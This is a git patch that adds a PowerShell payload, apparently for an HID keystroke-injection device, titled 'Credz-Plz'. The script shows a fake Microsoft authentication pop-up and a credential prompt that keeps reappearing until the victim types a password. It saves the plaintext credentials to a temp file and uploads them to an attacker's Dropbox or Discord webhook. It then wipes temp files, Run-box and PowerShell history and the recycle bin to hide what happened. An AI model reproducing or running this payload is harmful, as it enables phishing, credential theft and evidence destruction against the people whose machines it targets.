From ad5f787a55b36f25cef313678efe6ca4f13f8a0c Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Tue, 3 Jan 2023 20:13:41 -0600
Subject: [PATCH] Create test.ps1
---
 Payloads/Flip-Credz-Plz/test.ps1 | 216 +++++++++++++++++++++++++++++++
 1 file changed, 216 insertions(+)
 create mode 100644 Payloads/Flip-Credz-Plz/test.ps1
diff --git a/Payloads/Flip-Credz-Plz/test.ps1 b/Payloads/Flip-Credz-Plz/test.ps1
new file mode 100644
index 0000000..680f45e
--- /dev/null
+++ b/Payloads/Flip-Credz-Plz/test.ps1
@@ -0,0 +1,216 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
+.DESCRIPTION
+ A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+ This will be followed by a fake authentication ui prompt.
+ If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
+ Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
+.Link
+ https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+# This is for if you want to host your own version of the script
+
+# $db = "YOUR-DROPBOX-ACCESS-TOKEN"
+
+# $dc = "YOUR-DISCORD-WEBHOOK"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+.NOTES
+ This is to generate the ui.prompt you will use to harvest their credentials
+#>
+
+function Get-Creds {
+
+$form = $null
+
+while ($form -eq $null)
+{
+ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
+
+ if ($cred.Password -eq "")
+ {
+ Write-Output "Credentials cannot be left blank. Please try again."
+ $cred = $null
+ }
+
+ else{$creds = $cred.GetNetworkCredential() | fl
+ return $creds}
+}
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+function Caps-Off {
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+}
+#----------------------------------------------------------------------------------------------------
+
+<#
+.NOTES
+ This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
+#>
+
+Pause-Script
+
+Caps-Off
+
+Add-Type -AssemblyName PresentationCore,PresentationFramework
+$msgBody = "Please authenticate your Microsoft Account."
+$msgTitle = "Authentication Required"
+$msgButton = 'Ok'
+$msgImage = 'Warning'
+$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)
+Write-Host "The user clicked: $Result"
+
+$creds = Get-Creds
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+.NOTES
+ This is to save the gathered credentials to a file in the temp directory
+#>
+
+echo $creds >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+.NOTES
+ This is to upload your files to dropbox
+#>
+
+function DropBox-Upload {
+
+[CmdletBinding()]
+param (
+
+[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+[Alias("f")]
+[string]$SourceFilePath
+)
+$outputFile = Split-Path $SourceFilePath -leaf
+$TargetFilePath="/$outputFile"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType
'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+exit